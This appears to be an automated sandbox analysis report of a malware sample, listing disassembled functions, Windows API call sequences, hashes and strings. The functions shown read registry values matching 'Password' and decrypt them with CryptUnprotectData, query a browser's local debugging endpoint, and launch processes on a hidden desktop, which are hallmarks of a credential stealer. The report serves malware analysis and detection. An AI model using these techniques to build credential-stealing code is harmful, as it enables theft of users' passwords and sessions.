Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcatlstrlen
String ID:
API String ID: 1049500425-0
Opcode ID: 311b411c21f255103ceab64b58adb14faa11b83e9ac96c1b0ac2e3f17e097d2a
Instruction ID: 274b4ab71ddff461c781089cdb5a89f9d7377c7fda2b54a99ae9043ae0fda87f
Opcode Fuzzy Hash: 311b411c21f255103ceab64b58adb14faa11b83e9ac96c1b0ac2e3f17e097d2a
Instruction Fuzzy Hash: 84914CB57017039BD720AFB6DD88A17B7E9AF14344B54583EA881D33B1DBB8D841CBA4

Function 024E12D7 Relevance: 36.3, APIs: 24, Instructions: 278stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 024E12F1

Part of subcall function 024E1267: GetProcessHeap.KERNEL32(00000000,00000104), ref: 024E127C
Part of subcall function 024E1267: RtlAllocateHeap.NTDLL(00000000), ref: 024E1283
Part of subcall function 024E1267: RegOpenKeyExA.ADVAPI32(80000001,00431D24,00000000,00020119,?), ref: 024E12A0
Part of subcall function 024E1267: RegQueryValueExA.ADVAPI32(?,00431D18,00000000,00000000,00000000,000000FF), ref: 024E12BA
Part of subcall function 024E1267: RegCloseKey.ADVAPI32(?), ref: 024E12C4

lstrcat.KERNEL32(?,00000000), ref: 024E1307
lstrlen.KERNEL32(?), ref: 024E1314
lstrcat.KERNEL32(?,00431D48), ref: 024E132F
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024E1366
lstrlen.KERNEL32(006389F0), ref: 024E1374
lstrcpy.KERNEL32(00000000,?), ref: 024E1398
lstrcat.KERNEL32(00000000,006389F0), ref: 024E13A0
lstrlen.KERNEL32(00431D50), ref: 024E13AB
lstrcpy.KERNEL32(00000000,00000000), ref: 024E13CF
lstrcat.KERNEL32(00000000,00431D50), ref: 024E13DB
lstrcpy.KERNEL32(00000000,00000000), ref: 024E1401
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024E1446
lstrlen.KERNEL32(00638CA4), ref: 024E1455
lstrcpy.KERNEL32(00000000,?), ref: 024E147C
lstrcat.KERNEL32(00000000,?), ref: 024E1484
lstrcpy.KERNEL32(00000000,00000000), ref: 024E14BF
lstrcat.KERNEL32(00000000), ref: 024E14CC
lstrcpy.KERNEL32(00000000,00000000), ref: 024E14F3
CopyFileA.KERNEL32(?,?,00000001), ref: 024E151C
lstrcpy.KERNEL32(00000000,?), ref: 024E1548
lstrcpy.KERNEL32(00000000,?), ref: 024E1584

Part of subcall function 024FF197: lstrcpy.KERNEL32(00000000,?), ref: 024FF1C9

DeleteFileA.KERNEL32(?), ref: 024E15B8
memset.MSVCRT ref: 024E15D5

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$lstrlen$FileHeapmemset$AllocateCloseCopyDeleteOpenProcessQueryValue
String ID:
API String ID: 1397529057-0
Opcode ID: 310d5bf42af13474714d64ac2762bf7d39da0fa1acd6f8eb4d61c63547e0b073
Instruction ID: 6f6d65835eea357058ad9a7e261bc5378d053e033a5943b191175f948d478c9e
Opcode Fuzzy Hash: 310d5bf42af13474714d64ac2762bf7d39da0fa1acd6f8eb4d61c63547e0b073
Instruction Fuzzy Hash: 5FA14271A002559BEF21EF75CC84E9E7BBAAF44306F04442AE90AA7351DB74DD01DFA0

Function 024FAE79 Relevance: 31.5, APIs: 25, Instructions: 297stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32 ref: 024FAE96
lstrlen.KERNEL32(00638DD4), ref: 024FAEAC
lstrcpy.KERNEL32(00000000,00000000), ref: 024FAED4
lstrcat.KERNEL32(00000000,00000000), ref: 024FAEDF
lstrcpy.KERNEL32(00000000,00000000), ref: 024FAF08
lstrcpy.KERNEL32(00000000,00000000), ref: 024FAF4B
lstrcat.KERNEL32(00000000,00000000), ref: 024FAF55
lstrcpy.KERNEL32(00000000,00000000), ref: 024FAF7E
lstrlen.KERNEL32(0043509C), ref: 024FAF98
lstrcpy.KERNEL32(00000000,00000000), ref: 024FAFBA
lstrcat.KERNEL32(00000000,0043509C), ref: 024FAFC6
lstrcpy.KERNEL32(00000000,00000000), ref: 024FAFEF
lstrlen.KERNEL32(0043509C), ref: 024FB001
lstrcpy.KERNEL32(00000000,00000000), ref: 024FB023
lstrcat.KERNEL32(00000000,0043509C), ref: 024FB02F
lstrcpy.KERNEL32(00000000,00000000), ref: 024FB058
lstrlen.KERNEL32(00638DB8), ref: 024FB06E
lstrcpy.KERNEL32(00000000,00000000), ref: 024FB096
lstrcat.KERNEL32(00000000,00000000), ref: 024FB0A1
lstrcpy.KERNEL32(00000000,00000000), ref: 024FB0CA
lstrcpy.KERNEL32(00000000,?), ref: 024FB106
lstrcat.KERNEL32(00000000,00000000), ref: 024FB110
lstrcpy.KERNEL32(00000000,00000000), ref: 024FB136
lstrlen.KERNEL32(00000000), ref: 024FB14C
lstrcpy.KERNEL32(00000000,00638A98), ref: 024FB17F

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$lstrlen
String ID:
API String ID: 2762123234-0
Opcode ID: 9101464e6f8103f87ad889bfc074e9eb7c51b8aa548391c385bb6237e351800d
Instruction ID: e9bc5eb57b865eb9da27546f374a261b5fe04f43633ccfe4855da1fe6e3afda9
Opcode Fuzzy Hash: 9101464e6f8103f87ad889bfc074e9eb7c51b8aa548391c385bb6237e351800d
Instruction Fuzzy Hash: CAB15C719016269FEB21EF75CC88AAF77BAFF85309F04052AE91597650DBB4D900CFA0

Function 02501A67 Relevance: 31.5, APIs: 25, Instructions: 269stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 02501A96
lstrlen.KERNEL32(00638DEC), ref: 02501AA7
lstrcpy.KERNEL32(00000000,00000000), ref: 02501ACE
lstrcat.KERNEL32(00000000,00000000), ref: 02501AD9
lstrcpy.KERNEL32(00000000,00000000), ref: 02501B08
lstrlen.KERNEL32(00435564), ref: 02501B1A
lstrcpy.KERNEL32(00000000,00000000), ref: 02501B3B
lstrcat.KERNEL32(00000000,00435564), ref: 02501B47
lstrcpy.KERNEL32(00000000,00000000), ref: 02501B76
lstrlen.KERNEL32(00638B1C), ref: 02501B8C
lstrcpy.KERNEL32(00000000,00000000), ref: 02501BB3
lstrcat.KERNEL32(00000000,00000000), ref: 02501BBE
lstrcpy.KERNEL32(00000000,00000000), ref: 02501BED
lstrlen.KERNEL32(00435564), ref: 02501BFF
lstrcpy.KERNEL32(00000000,00000000), ref: 02501C20
lstrcat.KERNEL32(00000000,00435564), ref: 02501C2C
lstrcpy.KERNEL32(00000000,00000000), ref: 02501C5B
lstrlen.KERNEL32(00638D70), ref: 02501C71
lstrcpy.KERNEL32(00000000,00000000), ref: 02501C98
lstrcat.KERNEL32(00000000,00000000), ref: 02501CA3
lstrcpy.KERNEL32(00000000,00000000), ref: 02501CD2
lstrlen.KERNEL32(00638D6C), ref: 02501CE8
lstrcpy.KERNEL32(00000000,00000000), ref: 02501D0F
lstrcat.KERNEL32(00000000,00000000), ref: 02501D1A
lstrcpy.KERNEL32(00000000,00000000), ref: 02501D49

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcatlstrlen
String ID:
API String ID: 1049500425-0
Opcode ID: 7d047b6832bef589f5634e053af651aa6ff54b82b49a647bfc4f6edddc21a2fc
Instruction ID: 8bd12b6c39172f37f00bc1b9038e5f20fb5eaaaf1cd6d3bbba47b81463df1019
Opcode Fuzzy Hash: 7d047b6832bef589f5634e053af651aa6ff54b82b49a647bfc4f6edddc21a2fc
Instruction Fuzzy Hash: E09101B1600B439FEB209F7ACCC4A167BEEBF04349B14982DA886D7690DB74D841DB65

Function 024E9ADD Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 174stringsleepprocessCOMMON

Download Yara Rule

APIs

CreateDesktopA.USER32(?), ref: 024E9AEF
memset.MSVCRT ref: 024E9B0D
lstrcat.KERNEL32(?,?), ref: 024E9B22
lstrcat.KERNEL32(?,?), ref: 024E9B34
lstrcat.KERNEL32(?,00435128), ref: 024E9B44
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 024E9B81
lstrcpy.KERNEL32(00000000,?), ref: 024E9BB7
StrStrA.SHLWAPI(?,00638C5C), ref: 024E9BCC
lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 024E9BE9
lstrlen.KERNEL32(?), ref: 024E9BFD
wsprintfA.USER32 ref: 024E9C0D
lstrcpy.KERNEL32(?,?), ref: 024E9C24
memset.MSVCRT ref: 024E9C3A
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,00000000), ref: 024E9C99
Sleep.KERNEL32(00001388), ref: 024E9CA8
CloseDesktop.USER32(?), ref: 024E9CE8

Strings

D, xrefs: 024E9C51

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcat$CreateDesktoplstrcpymemset$CloseFolderPathProcessSleeplstrcpynlstrlenwsprintf
String ID: D
API String ID: 3850938096-2746444292
Opcode ID: 5eab061456a3bc98197d9bb77ac40b44eda55df27ed5337f7ac901d636f383d5
Instruction ID: 81683ae0e44a86ea0d39cdaf17555d0ea7a765787711c6fdef6f435678401307
Opcode Fuzzy Hash: 5eab061456a3bc98197d9bb77ac40b44eda55df27ed5337f7ac901d636f383d5
Instruction Fuzzy Hash: 896151B1604340AFE720DF74DC85F9A77E9AF88705F00491DFA4A8B291DBB49904CFA6

Function 004090F0 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 161networkstringfileCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 0040910F
InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 0040912C
InternetCloseHandle.WININET(00000000), ref: 00409139
strlen.MSVCRT ref: 00409155
InternetReadFile.WININET(?,?,?,00000000), ref: 00409196
InternetReadFile.WININET(00000000,?,00001000,?), ref: 004091C7
InternetCloseHandle.WININET(00000000), ref: 004091D2
InternetCloseHandle.WININET(00000000), ref: 004091D9
strlen.MSVCRT ref: 004091EA
strlen.MSVCRT ref: 0040921D
strlen.MSVCRT ref: 0040925E

Part of subcall function 00417EB0: memchr.MSVCRT ref: 00417EEF
Part of subcall function 00417EB0: memcmp.MSVCRT(00000000,?,?,?,"webSocketDebuggerUrl":,00000000), ref: 00417F09
Part of subcall function 00417EB0: memchr.MSVCRT ref: 00417F28

strlen.MSVCRT ref: 0040927C

Part of subcall function 004089B0: std::_Xinvalid_argument.LIBCPMT ref: 004089C6

Strings

"ws://, xrefs: 00409259, 00409264
"webSocketDebuggerUrl":, xrefs: 004091E5, 004091F0
http://localhost:9229/json, xrefs: 00409126

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: Internet$strlen$CloseHandle$FileOpenReadmemchr$Xinvalid_argumentmemcmpstd::_
String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
API String ID: 4166274400-2144369209
Opcode ID: 0c6aa3a70782f887abaeb98b790b0c8f3578e5d0b449c1f4a755a60c44504834
Instruction ID: a7d092efa737f0fe45e53d089a45e304e661b41fe404ce77bc48f3d160830c15
Opcode Fuzzy Hash: 0c6aa3a70782f887abaeb98b790b0c8f3578e5d0b449c1f4a755a60c44504834
Instruction Fuzzy Hash: AD51C571B00205ABDB20DFA4DC45BDEF7F9DB48714F14416AF904E3281DBB8EA4587A9

Function 024EB660 Relevance: 25.5, APIs: 20, Instructions: 451stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 024EB687
lstrcpy.KERNEL32(00000000,00000000), ref: 024EB6D5
lstrcpy.KERNEL32(00000000,00000000), ref: 024EB700
lstrcat.KERNEL32(00000000,00000000), ref: 024EB708
lstrcpy.KERNEL32(00000000,00000000), ref: 024EB730
lstrlen.KERNEL32(00435214), ref: 024EB7A7
lstrcpy.KERNEL32(00000000,00000000), ref: 024EB7CB
lstrcat.KERNEL32(00000000,00435214), ref: 024EB7D7
lstrcpy.KERNEL32(00000000,00000000), ref: 024EB800
lstrlen.KERNEL32(00000000), ref: 024EB884
lstrcpy.KERNEL32(00000000,00000000), ref: 024EB8AE
lstrcat.KERNEL32(00000000,00000000), ref: 024EB8B6
lstrcpy.KERNEL32(00000000,00000000), ref: 024EB8DE
lstrlen.KERNEL32(0043509C), ref: 024EB955
lstrcpy.KERNEL32(00000000,00000000), ref: 024EB979
lstrcat.KERNEL32(00000000,0043509C), ref: 024EB985
lstrcpy.KERNEL32(00000000,00000000), ref: 024EB9B5
lstrlen.KERNEL32(?), ref: 024EBABE
lstrlen.KERNEL32(?), ref: 024EBACD
lstrcpy.KERNEL32(00000000,00000000), ref: 024EBAF5

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: caf0e5c52129c9e0c170800c9da7536f1db1eb5a9e1db09bea434f579a2868c7
Instruction ID: 35b673648feb4b74d40d325ab568fcdafc71b0c3aecfba5a05f985073f271ecd
Opcode Fuzzy Hash: caf0e5c52129c9e0c170800c9da7536f1db1eb5a9e1db09bea434f579a2868c7
Instruction Fuzzy Hash: B7021170A016158FEF25DF65C988A6AB7B6FF4430EF18806ED80A9B361D775D842CF90

Function 00407710 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringregistrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00407745
RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0040778A
strlen.MSVCRT ref: 004077BE
StrStrA.SHLWAPI(?,Password), ref: 004077F8
strlen.MSVCRT ref: 0040788D

Part of subcall function 00407690: GetProcessHeap.KERNEL32(00000008,00000400), ref: 0040769E
Part of subcall function 00407690: HeapAlloc.KERNEL32(00000000), ref: 004076A5
Part of subcall function 00407690: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004076CD
Part of subcall function 00407690: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 004076ED
Part of subcall function 00407690: LocalFree.KERNEL32(?), ref: 004076F7

strcpy_s.MSVCRT ref: 00407821
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040782C
HeapFree.KERNEL32(00000000), ref: 00407833
strlen.MSVCRT ref: 00407840
strcpy_s.MSVCRT ref: 0040786A
strlen.MSVCRT ref: 004078B4
RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00407975

Strings

Password, xrefs: 004077EC

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: Heapstrlen$EnumFreeProcessValuestrcpy_s$AllocByteCharCryptDataLocalMultiOpenUnprotectWide
String ID: Password
API String ID: 3893107980-3434357891
Opcode ID: 14964dbc208ebe2bd5570b721c02be0e9f6531da3a0e9e1e01ace35e59106e74
Instruction ID: e4d9b8b39298a74cb5cd03489e7ec67c358bc82c244f10be08d5cfcaf05cec85
Opcode Fuzzy Hash: 14964dbc208ebe2bd5570b721c02be0e9f6531da3a0e9e1e01ace35e59106e74
Instruction Fuzzy Hash: 16810EB1D00219AFDB10DF95DC84ADEB7B9EF48300F10816AE505F7250EB75AA45CFA5

Function 0041F100 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 163stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 0041F134
lstrcpy.KERNEL32(00000000,?), ref: 0041F162
StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F176
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F185
LocalAlloc.KERNEL32(00000040,00000001,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F1A3
StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F1D1
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F1E4
strtok.MSVCRT(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F1F6
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F202
lstrcpy.KERNEL32(00000000,ERROR), ref: 0041F24F
lstrcpy.KERNEL32(00000000,ERROR), ref: 0041F28F

Strings

ERROR, xrefs: 0041F170, 0041F20F, 0041F249, 0041F289

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$AllocLocalstrtok
String ID: ERROR
API String ID: 2137491262-2861137601
Opcode ID: 05761cc4364c42234ee252b2b5c3c3c7f577dcc16320945f4f877e0f0401f89e
Instruction ID: 57b76eaee00c9718718f693bae5590ba1c15cb9a89fb7e987ba6136f15d61003
Opcode Fuzzy Hash: 05761cc4364c42234ee252b2b5c3c3c7f577dcc16320945f4f877e0f0401f89e
Instruction Fuzzy Hash: DB51D375A002019FCB20AF75CD49AAB77B5AF44314F04417AF849EB3A1DB78DC468BD8

Function 024FF367 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 163stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 024FF39B
lstrcpy.KERNEL32(00000000,?), ref: 024FF3C9
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 024FF3DD
lstrlen.KERNEL32(00000000), ref: 024FF3EC
LocalAlloc.KERNEL32(00000040,00000001), ref: 024FF40A
StrStrA.SHLWAPI(00000000,?), ref: 024FF438
lstrlen.KERNEL32(?), ref: 024FF44B
strtok.MSVCRT(00000001,?), ref: 024FF45D
lstrlen.KERNEL32(00000000), ref: 024FF469
lstrcpy.KERNEL32(00000000,ERROR), ref: 024FF4B6
lstrcpy.KERNEL32(00000000,ERROR), ref: 024FF4F6

Strings

ERROR, xrefs: 024FF3D7, 024FF476, 024FF4B0, 024FF4F0

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$AllocLocalstrtok
String ID: ERROR
API String ID: 2137491262-2861137601
Opcode ID: 5b04030854d19af2b8db990e9c3e012bdc99472458b3ca0eed52a94b25b620b2
Instruction ID: 8eb1871d9cfc8f325dda19a6856c4dace6520c245b013efc12033decd257e4d0
Opcode Fuzzy Hash: 5b04030854d19af2b8db990e9c3e012bdc99472458b3ca0eed52a94b25b620b2
Instruction Fuzzy Hash: D651BD719002519FDB21EF39CC48EAE7BEAAF84309F05451AEE4A9BB51DB74D805CB90

Function 0040A070 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(00A3AC60,00639BD8,0000FFFF), ref: 0040A086
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0040A0B3
lstrlenA.KERNEL32(00639BD8), ref: 0040A0C0
lstrcpy.KERNEL32(00000000,00639BD8), ref: 0040A0EA
lstrlenA.KERNEL32(00435210), ref: 0040A0F5
lstrcpy.KERNEL32(00000000,00000000), ref: 0040A112
lstrcatA.KERNEL32(00000000,00435210), ref: 0040A11E
lstrcpy.KERNEL32(00000000,00000000), ref: 0040A144
lstrcatA.KERNEL32(00000000,00000000), ref: 0040A14F
lstrcpy.KERNEL32(00000000,00000000), ref: 0040A174
SetEnvironmentVariableA.KERNEL32(00A3AC60,00000000), ref: 0040A18F
LoadLibraryA.KERNEL32(00A3E740), ref: 0040A1A3

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID:
API String ID: 2929475105-0
Opcode ID: e71572c05e61fd10cfa811daea49d805ade7cf6361090e2ab5aad4db3d6ecf1a
